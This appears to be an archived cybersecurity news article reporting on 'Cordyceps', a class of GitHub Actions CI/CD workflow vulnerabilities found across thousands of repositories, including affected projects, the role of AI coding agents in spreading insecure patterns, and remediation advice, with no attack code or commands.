CyberIntel ⬡ News
★ Saved ◆ Cyber Reads
← Back ◇ Industry News & Leadership Jun 23, 2026

Cordyceps Supply Chain Flaw Impacting Code Repositories at thousands of Organizations

Cybersecurity News Archived Jun 23, 2026 ✓ Full text saved

A newly discovered supply chain flaw is putting thousands of organizations at serious risk. Named Cordyceps after the parasitic fungus known for taking over its hosts, this critical vulnerability quietly burrows into software development pipelines and gives attackers full control of code repositories at some of the biggest companies in the world. The flaw targets […] The post Cordyceps Supply Chain Flaw Impacting Code Repositories at thousands of Organizations appeared first on Cyber Security Ne

Full text archived locally
✦ AI Summary · Claude Sonnet


    HomeCyber Security News Cordyceps Supply Chain Flaw Impacting Code Repositories at thousands of Organizations By Tushar Subhra Dutta June 23, 2026 A newly discovered supply chain flaw is putting thousands of organizations at serious risk. Named Cordyceps after the parasitic fungus known for taking over its hosts, this critical vulnerability quietly burrows into software development pipelines and gives attackers full control of code repositories at some of the biggest companies in the world. The flaw targets CI/CD workflows, the automated pipelines developers use to build, test, and release software. These workflows run shell commands, hold signing keys, authenticate to cloud providers, and publish releases. Yet they are widely treated as simple configuration files rather than security-critical code. That gap in perception is exactly what Cordyceps exploits. Researchers at Novee identified this systemic class of exploitable vulnerabilities across the open-source supply chain, noting patterns of command injection, broken authentication logic, artifact poisoning chains, and privilege escalation in GitHub Actions workflows. Novee said in a report shared with Cyber Security News (CSN) that the team scanned roughly 30,000 high-impact repositories and confirmed hundreds of fully exploitable attack chains. What makes this discovery alarming is not just the technical depth of the flaw, but its accessibility. Any person with a free GitHub account can exploit it without needing special privileges or organizational membership. A single pull request, or even a comment on one, can be enough to trigger the chain and hand an outsider full control of a project’s build pipeline. The downstream reach is enormous. When one compromised repository supplies software that thousands of organizations depend on, a single attack can ripple outward into banks, cloud environments, AI labs, and end-user devices. Fixes have been confirmed at major organizations including Microsoft, Google, Apache, Cloudflare, and the Python Software Foundation. Cordyceps Supply Chain Flaw The most dangerous aspect of Cordyceps is how it hides in plain sight. The exploit chains are multi-step, meaning no single piece looks dangerous on its own. An untrusted pull request triggers a low-privilege workflow, whose output flows into a high-privilege workflow, which then authenticates to a cloud environment with the highest possible permissions. Every step appears normal, but the combination creates a clear path to full control. This is what makes the vulnerability so hard to catch with traditional security scanners. Standard tools check single files for known patterns, but the risk in Cordyceps only exists in how multiple workflows interact with each other. A scanner sees valid YAML configuration. An attacker sees a four-step chain leading to permanent credential access. Novee confirmed that over 300 repositories were fully exploitable. In Microsoft’s Azure Sentinel, a comment on a pull request was enough for an attacker to steal a non-expiring GitHub App key. For Google’s AI Agent Development Kit, a single pull request could hand an attacker the highest Google Cloud role. In Apache’s Doris, two zero-click attack paths were confirmed, both leading to credential theft and direct code modification rights. AI Is Compounding the Problem at Scale One of the most troubling findings in the Cordyceps research is the role AI coding agents are playing in spreading the flaw. As developers rely more heavily on AI tools to generate CI/CD configuration files quickly, those tools reproduce the same insecure patterns over and over. The result is the same class of vulnerability being quietly planted across potentially millions of repositories. Novee’s team pulled data across the npm, PyPI, crates, and Go ecosystems and flagged 654 repositories in a single scan. The proven impact covered the full build and release pipeline, touching everything from code pushes to protected branches to credential theft across AWS, GCP, and Netlify. Organizations that run software on GitHub or depend on open-source projects that do are urged to assess their exposure. The fix, once identified, is straightforward. Security teams should treat workflow code with the same rigor as application code, conduct cross-workflow audits, and ensure that trust boundaries between low-privilege and high-privilege workflows cannot be crossed by untrusted inputs like pull request titles, branch names, or comment bodies. Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google. Tags cyber security cyber security news Copy URL Linkedin Twitter ReddIt Telegram Tushar Subhra Dutta Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics. Trending News Hackers Using Claude and OpenAI’s Codex for Exploitation, and Data Exfiltration Activities CyberSentinel AI with 33 Security Tools, Including Nmap, SQLMap, ZAP, and uses Claude, GPT Hackers Use Fake Software Update Prompts to Steal Passwords and Crypto Wallet Data From macOS Users Hackers Abuse PowerShell Commands to Deliver SmartRAT Through Brazilian Bank Phishing Page Hackers Use Weaponized Windows Shortcuts to Spread Crypto Clipper Across USB Drives Latest News Cyber Security News Scattered Spider Hackers Who Breached London Transport Network Plead Guilty Cyber Security 15 Best Linux Network Monitoring Tools in 2026 Cyber Security News Researcher Earns $148,337 for Google Cloud Production RCE Vulnerability Cyber Security Tata Electronics Data Breach Exposes Confidential Apple and Tesla Documents Cyber Security News New Phishing Attack Abuses Outlook and Microsoft 365 Groups Features to Attack Users
    💬 Team Notes
    Article Info
    Source
    Cybersecurity News
    Category
    ◇ Industry News & Leadership
    Published
    Jun 23, 2026
    Archived
    Jun 23, 2026
    Full Text
    ✓ Saved locally
    Open Original ↗